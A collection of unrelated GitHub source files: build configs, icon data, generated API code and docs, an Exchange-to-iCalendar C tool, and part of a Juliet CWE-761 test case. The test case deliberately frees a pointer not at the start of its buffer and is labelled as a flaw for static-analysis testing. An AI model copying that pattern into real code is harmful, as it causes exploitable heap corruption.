    <ClInclude Include="ReflectiveDLLInjection.h" />
  </ItemGroup>
  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
  <ImportGroup Label="ExtensionTargets">
  </ImportGroup>
</Project> | {
"pile_set_name": "Github"
} |
Welcome, authenticated client
<!-- Test fixture (path suggests the Ferrum browser-driver specs): a minimal
     POST form with no input fields; submitting posts back to
     /ferrum/post_basic_auth. -->
<form name="input" action="/ferrum/post_basic_auth" method="post">
<input type="submit" value="Submit">
</form>
| {
"pile_set_name": "Github"
} |
'use strict';
Object.defineProperty(exports, '__esModule', { value: true });
var prefix = 'fab';
var iconName = 'aws';
var width = 640;
var height = 512;
var ligatures = [];
var unicode = 'f375';
var svgPathData = 'M180.41 203.01c-.72 22.65 10.6 32.68 10.88 39.05a8.164 8.164 0 0 1-4.1 6.27l-12.8 8.96a10.66 10.66 0 0 1-5.63 1.92c-.43-.02-8.19 1.83-20.48-25.61a78.608 78.608 0 0 1-62.61 29.45c-16.28.89-60.4-9.24-58.13-56.21-1.59-38.28 34.06-62.06 70.93-60.05 7.1.02 21.6.37 46.99 6.27v-15.62c2.69-26.46-14.7-46.99-44.81-43.91-2.4.01-19.4-.5-45.84 10.11-7.36 3.38-8.3 2.82-10.75 2.82-7.41 0-4.36-21.48-2.94-24.2 5.21-6.4 35.86-18.35 65.94-18.18a76.857 76.857 0 0 1 55.69 17.28 70.285 70.285 0 0 1 17.67 52.36l-.01 69.29zM93.99 235.4c32.43-.47 46.16-19.97 49.29-30.47 2.46-10.05 2.05-16.41 2.05-27.4-9.67-2.32-23.59-4.85-39.56-4.87-15.15-1.14-42.82 5.63-41.74 32.26-1.24 16.79 11.12 31.4 29.96 30.48zm170.92 23.05c-7.86.72-11.52-4.86-12.68-10.37l-49.8-164.65c-.97-2.78-1.61-5.65-1.92-8.58a4.61 4.61 0 0 1 3.86-5.25c.24-.04-2.13 0 22.25 0 8.78-.88 11.64 6.03 12.55 10.37l35.72 140.83 33.16-140.83c.53-3.22 2.94-11.07 12.8-10.24h17.16c2.17-.18 11.11-.5 12.68 10.37l33.42 142.63L420.98 80.1c.48-2.18 2.72-11.37 12.68-10.37h19.72c.85-.13 6.15-.81 5.25 8.58-.43 1.85 3.41-10.66-52.75 169.9-1.15 5.51-4.82 11.09-12.68 10.37h-18.69c-10.94 1.15-12.51-9.66-12.68-10.75L328.67 110.7l-32.78 136.99c-.16 1.09-1.73 11.9-12.68 10.75h-18.3zm273.48 5.63c-5.88.01-33.92-.3-57.36-12.29a12.802 12.802 0 0 1-7.81-11.91v-10.75c0-8.45 6.2-6.9 8.83-5.89 10.04 4.06 16.48 7.14 28.81 9.6 36.65 7.53 52.77-2.3 56.72-4.48 13.15-7.81 14.19-25.68 5.25-34.95-10.48-8.79-15.48-9.12-53.13-21-4.64-1.29-43.7-13.61-43.79-52.36-.61-28.24 25.05-56.18 69.52-55.95 12.67-.01 46.43 4.13 55.57 15.62 1.35 2.09 2.02 4.55 1.92 7.04v10.11c0 4.44-1.62 6.66-4.87 6.66-7.71-.86-21.39-11.17-49.16-10.75-6.89-.36-39.89.91-38.41 24.97-.43 18.96 26.61 26.07 29.7 26.89 36.46 10.97 48.65 12.79 63.12 29.58 17.14 22.25 7.9 48.3 4.35 55.44-19.08 37.49-68.42 34.44-69.26 34.42zm40.2 104.86c-70.03 51.72-171.69 79.25-258.49 79.25A469.127 469.127 0 0 1 2.83 327.46c-6.53-5.89-.77-13.96 7.17-9.47a637.37 637.37 0 0 0 316.88 84.12 630.22 630.22 0 0 0 
241.59-49.55c11.78-5 21.77 7.8 10.12 16.38zm29.19-33.29c-8.96-11.52-59.28-5.38-81.81-2.69-6.79.77-7.94-5.12-1.79-9.47 40.07-28.17 105.88-20.1 113.44-10.63 7.55 9.47-2.05 75.41-39.56 106.91-5.76 4.87-11.27 2.3-8.71-4.1 8.44-21.25 27.39-68.49 18.43-80.02z';
exports.definition = {
prefix: prefix,
iconName: iconName,
icon: [
width,
height,
ligatures,
unicode,
svgPathData
]};
exports.faAws = exports.definition;
exports.prefix = prefix;
exports.iconName = iconName;
exports.width = width;
exports.height = height;
exports.ligatures = ligatures;
exports.unicode = unicode;
exports.svgPathData = svgPathData; | {
"pile_set_name": "Github"
} |
<HTML>
<HEAD>
<meta charset="UTF-8">
<title>KhaiiiLoggerType.Word - koalanlp</title>
<link rel="stylesheet" href="../../../style.css">
</HEAD>
<BODY>
<!-- Auto-generated API documentation page (Dokka-style, judging by the
     source link and breadcrumb below) for the KhaiiiLoggerType.Word entry;
     manual edits are likely overwritten on the next doc build. -->
<a href="../../index.html">koalanlp</a>&nbsp;/&nbsp;<a href="../index.html">kr.bydelta.koala.khaiii</a>&nbsp;/&nbsp;<a href="index.html">KhaiiiLoggerType</a>&nbsp;/&nbsp;<a href="./-word.html">Word</a><br/>
<br/>
<h1>Word</h1>
<a name="kr.bydelta.koala.khaiii.KhaiiiLoggerType.Word"></a>
<code><span class="identifier">Word</span></code> <a href="https://github.com/koalanlp/koalanlp/blob/master/khaiii/src/main/kotlin/kr/bydelta/koala/khaiii/ext.kt#L137">(source)</a>
<p>어절 구성</p>
</BODY>
</HTML>
| {
"pile_set_name": "Github"
} |
# Default configuration for ppc64-softmmu
# Include all 32-bit boards
include ppc-softmmu.mak

# For PowerNV
CONFIG_POWERNV=y
# IPMI device models, listed here alongside the PowerNV machine
CONFIG_IPMI=y
CONFIG_IPMI_LOCAL=y
CONFIG_IPMI_EXTERN=y
CONFIG_ISA_IPMI_BT=y

# For pSeries
CONFIG_PSERIES=y
CONFIG_VIRTIO_VGA=y
# XICS interrupt controller follows CONFIG_PSERIES; the KVM variant is only
# enabled when CONFIG_KVM is also set (make-level $(call land,...) AND)
CONFIG_XICS=$(CONFIG_PSERIES)
CONFIG_XICS_SPAPR=$(CONFIG_PSERIES)
CONFIG_XICS_KVM=$(call land,$(CONFIG_PSERIES),$(CONFIG_KVM))
# memory device (DIMM) infrastructure
CONFIG_MEM_DEVICE=y
CONFIG_DIMM=y
CONFIG_SPAPR_RNG=y
| {
"pile_set_name": "Github"
} |
namespace Exercism.CSharp.Exercises.Generators
{
    /// <summary>
    /// Exercise generator for the "Pangram" exercise. The class body is
    /// empty: all behavior comes from the <see cref="GeneratorExercise"/>
    /// base class (defined elsewhere in the project).
    /// </summary>
    public class Pangram : GeneratorExercise
    {
    }
} | {
"pile_set_name": "Github"
} |
/* Generated by RuntimeBrowser
   Image: /System/Library/PrivateFrameworks/StoreKitUI.framework/StoreKitUI
 */

/* Private UINavigationController subclass from StoreKitUI. Only the single
   method below is visible in this RuntimeBrowser dump; the anonymous
   two-double struct in the signature is RuntimeBrowser's reconstruction of
   CGSize. */
@interface _SKUIModalSheetNavigationController : UINavigationController

/* Returns the size the given child content container should occupy within
   the supplied parent container size (UIContentContainer-style hook). */
- (struct CGSize { double x1; double x2; })sizeForChildContentContainer:(id)arg1 withParentContainerSize:(struct CGSize { double x1; double x2; })arg2;

@end
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<resources>
    <array name="sina_video_videoview_layers">
        <item>@layout/control_layer</item>
    </array>
    <!-- New structure -->
    <array name="sv_videoview_layers">
        <item>@array/sv_videoview_layer_controllayer</item>
    </array>
    <!-- One group of portrait + landscape control layers -->
    <array name="sv_videoview_layer_controllayer">
        <item>@layout/control_layer</item>
        <item>@layout/control_layer_horizon</item>
    </array>
</resources> | {
"pile_set_name": "Github"
} |
/*
COPYRIGHT STATUS:
Dec 1st 2001, Fermi National Accelerator Laboratory (FNAL) documents and
software are sponsored by the U.S. Department of Energy under Contract No.
DE-AC02-76CH03000. Therefore, the U.S. Government retains a world-wide
non-exclusive, royalty-free license to publish or reproduce these documents
and software for U.S. Government purposes. All documents and software
available from this server are protected under the U.S. and Foreign
Copyright Laws, and FNAL reserves all rights.
Distribution of the software available from this server is free of
charge subject to the user following the terms of the Fermitools
Software Legal Information.
Redistribution and/or modification of the software shall be accompanied
by the Fermitools Software Legal Information (including the copyright
notice).
The user is asked to feed back problems, benefits, and/or suggestions
about the software to the Fermilab Software Providers.
Neither the name of Fermilab, the URA, nor the names of the contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
DISCLAIMER OF LIABILITY (BSD):
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL FERMILAB,
OR THE URA, OR THE U.S. DEPARTMENT of ENERGY, OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Liabilities of the Government:
This software is provided by URA, independent from its Prime Contract
with the U.S. Department of Energy. URA is acting independently from
the Government and in its own private capacity and is not acting on
behalf of the U.S. Government, nor as its contractor nor its agent.
Correspondingly, it is understood and agreed that the U.S. Government
has no connection to this software and in no manner whatsoever shall
be liable for nor assume any responsibility or obligation for any claim,
cost, or damages arising out of or resulting from the use of the software
available from this server.
Export Control:
All documents and software available from this server are subject to U.S.
export control laws. Anyone downloading information from this server is
obligated to secure any necessary Government licenses before exporting
documents or software obtained from this server.
*/
package org.dcache.vehicles.alarms;
import java.util.List;
import diskCacheV111.vehicles.Message;
import org.dcache.alarms.LogEntry;
import org.dcache.util.FieldSort;
/**
 * <p>Request for list of alarms filtered by date range and/or type.</p>
 *
 * <p>All fields are wrapper types; a {@code null} value means the
 * corresponding filter or option is unset. The {@code alarms} field is
 * presumably populated with the result list on the reply — verify against
 * the responding service.</p>
 */
public class AlarmsRequestMessage extends Message {
    // paging controls (null = unset)
    private Long limit;
    private Long offset;
    // date-range bounds for the query (null = unbounded)
    private Long before;
    private Long after;
    // optional filters on log-entry attributes (null = do not filter)
    private String type;
    private Boolean includeClosed;
    private String severity;
    private String host;
    private String domain;
    private String service;
    private String info;
    // requested sort order for the result
    private List<FieldSort> sort;
    // result payload: matching alarm entries
    private List<LogEntry> alarms;

    /* Trivial getters: plain field accessors, no defensive copies. */

    public Long getAfter() {
        return after;
    }

    public List<LogEntry> getAlarms() {
        return alarms;
    }

    public Long getBefore() {
        return before;
    }

    public String getDomain() {
        return domain;
    }

    public String getHost() {
        return host;
    }

    public Boolean getIncludeClosed() {
        return includeClosed;
    }

    public String getInfo() {
        return info;
    }

    public Long getLimit() {
        return limit;
    }

    public Long getOffset() {
        return offset;
    }

    public String getService() {
        return service;
    }

    public String getSeverity() {
        return severity;
    }

    public List<FieldSort> getSort() {
        return sort;
    }

    public String getType() {
        return type;
    }

    /* Trivial setters: plain field mutators, no validation. */

    public void setAfter(Long after) {
        this.after = after;
    }

    public void setAlarms(List<LogEntry> alarms) {
        this.alarms = alarms;
    }

    public void setBefore(Long before) {
        this.before = before;
    }

    public void setDomain(String domain) {
        this.domain = domain;
    }

    public void setHost(String host) {
        this.host = host;
    }

    public void setIncludeClosed(Boolean includeClosed) {
        this.includeClosed = includeClosed;
    }

    public void setInfo(String info) {
        this.info = info;
    }

    public void setLimit(Long limit) {
        this.limit = limit;
    }

    public void setOffset(Long offset) {
        this.offset = offset;
    }

    public void setService(String service) {
        this.service = service;
    }

    public void setSeverity(String severity) {
        this.severity = severity;
    }

    public void setSort(List<FieldSort> sort) {
        this.sort = sort;
    }

    public void setType(String type) {
        this.type = type;
    }
}
| {
"pile_set_name": "Github"
} |
// <auto-generated>
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License. See License.txt in the project root for
// license information.
//
// Code generated by Microsoft (R) AutoRest Code Generator.
// Changes may cause incorrect behavior and will be lost if the code is
// regenerated.
// </auto-generated>
namespace Microsoft.Bot.Connector
{
using Microsoft.Rest;
using Microsoft.Bot.Schema;
using System.Collections;
using System.Collections.Generic;
using System.Threading;
using System.Threading.Tasks;
    /// <summary>
    /// BotSignIn operations.
    /// </summary>
    /// <remarks>
    /// NOTE(review): this file is AutoRest-generated; the parameter
    /// descriptions below are reviewer annotations inferred from parameter
    /// names — confirm against the service's swagger before relying on them.
    /// </remarks>
    public partial interface IBotSignIn
    {
        /// <summary>
        /// Gets a sign-in URL. Only <paramref name="state"/> is required;
        /// all other parameters are optional (default to null).
        /// </summary>
        /// <param name='state'>
        /// Serialized sign-in/token-exchange state (required).
        /// </param>
        /// <param name='codeChallenge'>
        /// Optional code challenge — presumably PKCE-style; verify.
        /// </param>
        /// <param name='emulatorUrl'>
        /// Optional emulator callback URL — verify semantics.
        /// </param>
        /// <param name='finalRedirect'>
        /// Optional URL to redirect to once sign-in completes — verify.
        /// </param>
        /// <param name='customHeaders'>
        /// The headers that will be added to request.
        /// </param>
        /// <param name='cancellationToken'>
        /// The cancellation token.
        /// </param>
        /// <exception cref="Microsoft.Rest.HttpOperationException">
        /// Thrown when the operation returned an invalid status code
        /// </exception>
        /// <exception cref="Microsoft.Rest.SerializationException">
        /// Thrown when unable to deserialize the response
        /// </exception>
        /// <exception cref="Microsoft.Rest.ValidationException">
        /// Thrown when a required parameter is null
        /// </exception>
        Task<HttpOperationResponse<string>> GetSignInUrlWithHttpMessagesAsync(string state, string codeChallenge = default(string), string emulatorUrl = default(string), string finalRedirect = default(string), Dictionary<string, List<string>> customHeaders = null, CancellationToken cancellationToken = default(CancellationToken));
    }
}
| {
"pile_set_name": "Github"
} |
{
"ver": "1.0.8",
"uuid": "f8380bfd-2c7e-4fde-95c3-dfc319499d9d",
"isPlugin": false,
"loadPluginInWeb": true,
"loadPluginInNative": true,
"loadPluginInEditor": false,
"subMetas": {}
} | {
"pile_set_name": "Github"
} |
# Copyright 2019 Google, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# [START vision_product_search_purge_products_in_product_set]
require "google/cloud/vision"

# Delete all products in a product set.
#
# The placeholder defaults are meant to be overridden by the CLI
# invocation at the bottom of the file (ARGV splat).
def product_search_purge_products_in_product_set \
    project_id = "your-project-id",
    location = "us-west1",
    product_set_id = "your-product-set-id"
  client = Google::Cloud::Vision.product_search

  # Fully-qualified resource name of the location that owns the product set.
  parent = client.location_path project: project_id, location: location

  config = {
    product_set_id: product_set_id
  }

  # The operation is irreversible and removes multiple products.
  # The user is required to pass in force=true to actually perform the purge.
  # If force is not set to true, the service raises an exception.
  force = true

  # The purge operation is async.
  operation = client.purge_products parent: parent,
                                    product_set_purge_config: config,
                                    force: force

  puts "Processing operation name: #{operation.name}"
  operation.wait_until_done! # Waits for the operation to complete

  puts "Products in product set #{product_set_id} deleted."
end
product_search_purge_products_in_product_set(*ARGV) if $PROGRAM_NAME == __FILE__
| {
"pile_set_name": "Github"
} |
--require("compat-5.1")  -- Lua 5.0 compatibility shim, left disabled

-- LuaInterface/luanet script: bind .NET types into Lua globals.
System=luanet.System
WebClient=System.Net.WebClient
StreamReader=System.IO.StreamReader
Math=System.Math

-- quick sanity check that the CLR bridge works (2^3)
print(Math:Pow(2,3))

-- open the URL given as the first command-line argument for reading
myWebClient = WebClient()
myStream = myWebClient:OpenRead(arg[1])
sr = StreamReader(myStream)

-- echo the response line by line; ReadLine() yields a falsy value at EOF,
-- which terminates the repeat/until loop
line=sr:ReadLine()
repeat
print(line)
line=sr:ReadLine()
until not line
myStream:Close()
| {
"pile_set_name": "Github"
} |
/*
Convert Exchange appointments and meetings to ICAL files
OpenChange Project
Copyright (C) Julien Kerihuel 2008
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#include <stdio.h>
#include <string.h>

#include "libexchange2ical/libexchange2ical.h"
/*
 * Parse a date range of the form "MM/DD/YYYY-MM/DD/YYYY" into two struct tm
 * values: tm_mon is converted to 0-11, tm_year to years-since-1900, and all
 * remaining time fields are zeroed.
 *
 * Fixes over the previous implementation:
 *  - strtok() tokenized the buffer in place, writing NUL bytes into memory
 *    reachable through a const pointer — undefined behavior (and a crash
 *    when callers pass a string literal).  sscanf() reads without writing.
 *  - strtok()/atoi() results were used without NULL checks, so a malformed
 *    range crashed; now both outputs are simply left fully zeroed.
 *  - tm_wday/tm_yday/tm_isdst were previously left uninitialized; both
 *    structs are now zeroed up front.
 */
static void getRange(const char *range, struct tm *start, struct tm *end)
{
	int	sm, sd, sy;	/* start month/day/year as written */
	int	em, ed, ey;	/* end month/day/year as written */

	memset(start, 0, sizeof *start);
	memset(end, 0, sizeof *end);

	if (sscanf(range, "%d/%d/%d-%d/%d/%d", &sm, &sd, &sy, &em, &ed, &ey) != 6) {
		return;	/* malformed range: leave both results zeroed */
	}

	start->tm_mon = sm - 1;
	start->tm_mday = sd;
	start->tm_year = sy - 1900;

	end->tm_mon = em - 1;
	end->tm_mday = ed;
	end->tm_year = ey - 1900;
}
/*
 * icalparser line-reader callback: fetch the next line (at most size-1
 * bytes) from the FILE* passed through the opaque data pointer.  Returns
 * the buffer on success, or NULL at end of file / on error — exactly the
 * fgets() contract.
 */
static char* read_stream(char *s, size_t size, void *d)
{
	return fgets(s, size, (FILE *) d);
}
/*
 * exchange2ical tool entry point.
 *
 * Flow:
 *   1. parse command-line options (profile database/name/password,
 *      optional .ics input, optional output file, optional date range);
 *   2. initialize the MAPI subsystem and log a session on;
 *   3. open the message store and the user's default calendar folder;
 *   4. with -i/--icalsync, push every VEVENT of the given .ics file up
 *      to the Exchange calendar folder;
 *   5. export the folder (optionally limited to the -R/--range window)
 *      as iCalendar text, printed to stdout or written to --filename.
 *
 * Returns 0 on success, 1 on any MAPI initialisation/connection error.
 */
int main(int argc, const char *argv[])
{
	enum MAPISTATUS retval;
	poptContext pc;
	int opt;
	mapi_object_t obj_store;
	mapi_object_t obj_folder;
	const char *opt_profdb = NULL;
	const char *opt_profname = NULL;
	const char *opt_password = NULL;
	const char *opt_debug = NULL;
	const char *opt_filename = NULL;
	const char *opt_icalsync = NULL;
	const char *opt_range = NULL;
	bool opt_dumpdata = false;
	FILE *fp = NULL;
	mapi_id_t fid;
	struct mapi_context *mapi_ctx;
	struct mapi_session *session = NULL;
	icalcomponent *vcal;
	struct tm start;
	struct tm end;
	icalparser *parser;
	icalcomponent *ical;
	icalcomponent *vevent;
	TALLOC_CTX *mem_ctx;

	/* Option ids start at 1000, presumably to stay clear of the
	   single-character short-option values popt can return -- the
	   popt convention for long-only options. */
	enum { OPT_PROFILE_DB=1000, OPT_PROFILE, OPT_PASSWORD, OPT_DEBUG, OPT_DUMPDATA, OPT_FILENAME, OPT_RANGE, OPT_ICALSYNC };

	struct poptOption long_options[] = {
		POPT_AUTOHELP
		{ "database", 'f', POPT_ARG_STRING, NULL, OPT_PROFILE_DB, "set the profile database path", NULL },
		{ "profile", 'p', POPT_ARG_STRING, NULL, OPT_PROFILE, "set the profile name", NULL },
		{ "password", 'P', POPT_ARG_STRING, NULL, OPT_PASSWORD, "set the profile password", NULL },
		{ "icalsync", 'i', POPT_ARG_STRING, NULL, OPT_ICALSYNC, "set the icalendar to convert to exchange", NULL },
		{ "filename", 'o', POPT_ARG_STRING, NULL, OPT_FILENAME, "set the output iCalendar filename", NULL },
		{ "range", 'R', POPT_ARG_STRING, NULL, OPT_RANGE, "set the range of accepted start dates", NULL },
		{ "debuglevel", 'd', POPT_ARG_STRING, NULL, OPT_DEBUG, "set the debug level", NULL },
		{ "dump-data", 0, POPT_ARG_NONE, NULL, OPT_DUMPDATA, "dump the hex data", NULL },
		POPT_OPENCHANGE_VERSION
		{ NULL, 0, 0, NULL, 0, NULL, NULL }
	};

	/* Collect all option arguments before touching MAPI. */
	pc = poptGetContext("exchange2ical", argc, argv, long_options, 0);
	while ((opt = poptGetNextOpt(pc)) != -1) {
		switch (opt) {
		case OPT_PROFILE_DB:
			opt_profdb = poptGetOptArg(pc);
			break;
		case OPT_FILENAME:
			opt_filename = poptGetOptArg(pc);
			break;
		case OPT_ICALSYNC:
			opt_icalsync = poptGetOptArg(pc);
			break;
		case OPT_RANGE:
			opt_range = poptGetOptArg(pc);
			break;
		case OPT_PROFILE:
			opt_profname = poptGetOptArg(pc);
			break;
		case OPT_PASSWORD:
			opt_password = poptGetOptArg(pc);
			break;
		case OPT_DEBUG:
			opt_debug = poptGetOptArg(pc);
			break;
		case OPT_DUMPDATA:
			opt_dumpdata = true;
			break;
		}
	}

	mem_ctx = talloc_named(NULL, 0, "exchange2ical_tool");

	/* Sanity Checks */
	/* Fall back to the default profile database under $HOME when the
	   user did not pass -f/--database. */
	if (!opt_profdb) {
		opt_profdb = talloc_asprintf(mem_ctx, DEFAULT_PROFDB, getenv("HOME"));
	}

	/* Initialize MAPI subsystem */
	retval = MAPIInitialize(&mapi_ctx, opt_profdb);
	if (retval != MAPI_E_SUCCESS) {
		mapi_errstr("MAPIInitialize", GetLastError());
		return 1;
	}

	/* debug options */
	if (opt_debug) {
		SetMAPIDebugLevel(mapi_ctx, atoi(opt_debug));
	}
	SetMAPIDumpData(mapi_ctx, opt_dumpdata);

	/* Log the profile on; octool_init_mapi prompts/loads credentials
	   as needed and returns NULL on failure. */
	session = octool_init_mapi(mapi_ctx, opt_profname, opt_password, 0);
	if(!session){
		mapi_errstr("Session", GetLastError());
		return 1;
	}

	/* Open Mailbox */
	mapi_object_init(&obj_store);
	retval = OpenMsgStore(session, &obj_store);
	if (retval != MAPI_E_SUCCESS) {
		mapi_errstr("OpenMsgStore", GetLastError());
		return 1;
	}

	/* Get default calendar folder */
	retval = GetDefaultFolder(&obj_store, &fid, olFolderCalendar);
	if (retval != MAPI_E_SUCCESS) {
		mapi_errstr("GetDefaultFolder", GetLastError());
		return 1;
	}

	/* Open default calendar folder */
	mapi_object_init(&obj_folder);
	retval = OpenFolder(&obj_store, fid, &obj_folder);
	if (retval != MAPI_E_SUCCESS) {
		mapi_errstr("OpenFolder", GetLastError());
		return 1;
	}

	/*Ical2exchange*/
	/* Optional import pass: parse the local .ics file and push each
	   VEVENT into the Exchange calendar folder. */
	if(opt_icalsync){
		if ((fp = fopen(opt_icalsync, "r")) == NULL) {
			perror("Can not open Icalendar file");
		} else {
			parser = icalparser_new();
			/* read_stream() pulls lines from fp for the parser. */
			icalparser_set_gen_data(parser,fp);
			ical = icalparser_parse(parser, read_stream);
			printf("\n\nICAL file:\n%s\n", icalcomponent_as_ical_string(ical));
			icalcomponent_strip_errors(ical);
			vevent = icalcomponent_get_first_component(ical, ICAL_VEVENT_COMPONENT);
			while(vevent){
				_IcalEvent2Exchange(&obj_folder, vevent);
				vevent = icalcomponent_get_next_component(ical, ICAL_VEVENT_COMPONENT);
			}
			icalcomponent_free(ical);
			icalparser_free(parser);
			fclose(fp);
			fp = NULL;
		}
	}

	/* Export pass: restrict to the requested start-date window when
	   -R/--range was given, otherwise dump the whole folder. */
	if(opt_range){
		getRange(opt_range, &start, &end);
		vcal = Exchange2IcalRange(&obj_folder, &start, &end);
	} else {
		vcal = Exchange2Ical(&obj_folder);
	}

	if(vcal){
		/* Icalendar save or print to console */
		char *cal = icalcomponent_as_ical_string(vcal);
		if (!opt_filename) {
			printf("\n\nICAL file:\n%s\n", cal);
		} else {
			size_t bytesWritten;
			if ((fp = fopen(opt_filename, "w")) == NULL) {
				perror("fopen");
				exit (1);
			}
			/* One element of strlen(cal) bytes: fwrite returns 1
			   only if the whole string was written. */
			bytesWritten = fwrite(cal, strlen(cal), 1, fp);
			if (bytesWritten < 1) {
				printf("BOGUS write length: %zi", bytesWritten);
			}
			fclose(fp);
		}
		/* NOTE(review): free(cal) assumes the caller owns the string
		   returned by icalcomponent_as_ical_string(); in newer libical
		   that function returns component-owned memory and the *_r
		   variant is the caller-owned one -- confirm against the
		   libical version in use. */
		free(cal);
		icalcomponent_free(vcal);
	}

	/* Teardown in reverse order of acquisition. */
	poptFreeContext(pc);
	mapi_object_release(&obj_folder);
	mapi_object_release(&obj_store);
	MAPIUninitialize(mapi_ctx);
	talloc_free(mem_ctx);

	return 0;
}
| {
"pile_set_name": "Github"
} |
/* TEMPLATE GENERATED TESTCASE FILE
Filename: CWE761_Free_Pointer_Not_at_Start_of_Buffer__char_environment_08.c
Label Definition File: CWE761_Free_Pointer_Not_at_Start_of_Buffer.label.xml
Template File: source-sinks-08.tmpl.c
*/
/*
* @description
* CWE: 761 Free Pointer not at Start of Buffer
* BadSource: environment Read input from an environment variable
* Sinks:
* GoodSink: free() memory correctly at the start of the buffer
* BadSink : free() memory not at the start of the buffer
* Flow Variant: 08 Control flow: if(staticReturnsTrue()) and if(staticReturnsFalse())
*
* */
#include "std_testcase.h"
#include <wchar.h>
#define ENV_VARIABLE "ADD"
#ifdef _WIN32
#define GETENV getenv
#else
#define GETENV getenv
#endif
#define SEARCH_CHAR 'S'
/* The two function below always return the same value, so a tool
should be able to identify that calls to the functions will always
return a fixed value. */
/* Always yields 1.  Exists so flow-variant test cases can wrap code in an
   if() whose outcome a static analysis tool should recognise as fixed. */
static int staticReturnsTrue()
{
    int alwaysOne = 1;
    return alwaysOne;
}
/* Always yields 0 -- the complement of staticReturnsTrue(), used to make
   the "good" branch of a flow variant statically dead. */
static int staticReturnsFalse()
{
    int alwaysZero = 0;
    return alwaysZero;
}
#ifndef OMITBAD
/*
 * bad: reads the ADD environment variable into a heap buffer, then
 * (since staticReturnsTrue() always takes the branch) advances the
 * 'data' pointer itself while scanning for SEARCH_CHAR and finally
 * calls free() on the advanced pointer -- the CWE-761 defect this
 * generated test case exists to exhibit.  Do not "fix" this function:
 * the flaw is the test payload.
 */
void CWE761_Free_Pointer_Not_at_Start_of_Buffer__char_environment_08_bad()
{
    char * data;
    data = (char *)malloc(100*sizeof(char));
    /* NOTE(review): malloc() result is not NULL-checked; presumably
       deliberate in this generated corpus -- confirm before reusing
       this pattern elsewhere. */
    data[0] = '\0';
    {
        /* Append input from an environment variable to data */
        size_t dataLen = strlen(data);
        char * environment = GETENV(ENV_VARIABLE);
        /* If there is data in the environment variable */
        if (environment != NULL)
        {
            /* POTENTIAL FLAW: Read data from an environment variable */
            strncat(data+dataLen, environment, 100-dataLen-1);
        }
    }
    if(staticReturnsTrue())
    {
        /* FLAW: We are incrementing the pointer in the loop - this will cause us to free the
         * memory block not at the start of the buffer */
        for (; *data != '\0'; data++)
        {
            if (*data == SEARCH_CHAR)
            {
                printLine("We have a match!");
                break;
            }
        }
        /* 'data' no longer equals the malloc() return value unless the
           buffer was empty: freeing it here is the defect under test. */
        free(data);
    }
}
#endif /* OMITBAD */
#ifndef OMITGOOD
/* goodB2G1() - use badsource and goodsink by changing staticReturnsTrue() to staticReturnsFalse() */
/* Same environment-variable source as bad(), but the always-false guard
   routes execution to the fixed sink, which walks the buffer with an
   index so 'data' still points at the allocation start when freed. */
static void goodB2G1()
{
    char * data;
    data = (char *)malloc(100*sizeof(char));
    data[0] = '\0';
    {
        /* Append input from an environment variable to data */
        size_t dataLen = strlen(data);
        char * environment = GETENV(ENV_VARIABLE);
        /* If there is data in the environment variable */
        if (environment != NULL)
        {
            /* POTENTIAL FLAW: Read data from an environment variable */
            strncat(data+dataLen, environment, 100-dataLen-1);
        }
    }
    if(staticReturnsFalse())
    {
        /* INCIDENTAL: CWE 561 Dead Code, the code below will never run */
        printLine("Benign, fixed string");
    }
    else
    {
        {
            size_t i;
            /* FIX: Use a loop variable to traverse through the string pointed to by data */
            for (i=0; i < strlen(data); i++)
            {
                if (data[i] == SEARCH_CHAR)
                {
                    printLine("We have a match!");
                    break;
                }
            }
            /* 'data' was never advanced, so this free() matches malloc(). */
            free(data);
        }
    }
}
/* goodB2G2() - use badsource and goodsink by reversing statements in if */
/* Variant of goodB2G1: the guard is the always-true helper, but the
   taken branch contains the fixed (index-based) sink, so the buffer is
   again freed at its start. */
static void goodB2G2()
{
    char * data;
    data = (char *)malloc(100*sizeof(char));
    data[0] = '\0';
    {
        /* Append input from an environment variable to data */
        size_t dataLen = strlen(data);
        char * environment = GETENV(ENV_VARIABLE);
        /* If there is data in the environment variable */
        if (environment != NULL)
        {
            /* POTENTIAL FLAW: Read data from an environment variable */
            strncat(data+dataLen, environment, 100-dataLen-1);
        }
    }
    if(staticReturnsTrue())
    {
        {
            size_t i;
            /* FIX: Use a loop variable to traverse through the string pointed to by data */
            for (i=0; i < strlen(data); i++)
            {
                if (data[i] == SEARCH_CHAR)
                {
                    printLine("We have a match!");
                    break;
                }
            }
            /* 'data' was never advanced, so this free() matches malloc(). */
            free(data);
        }
    }
}
/* Exercise both "good" (non-flawed) variants of this flow-variant
   test case in sequence. */
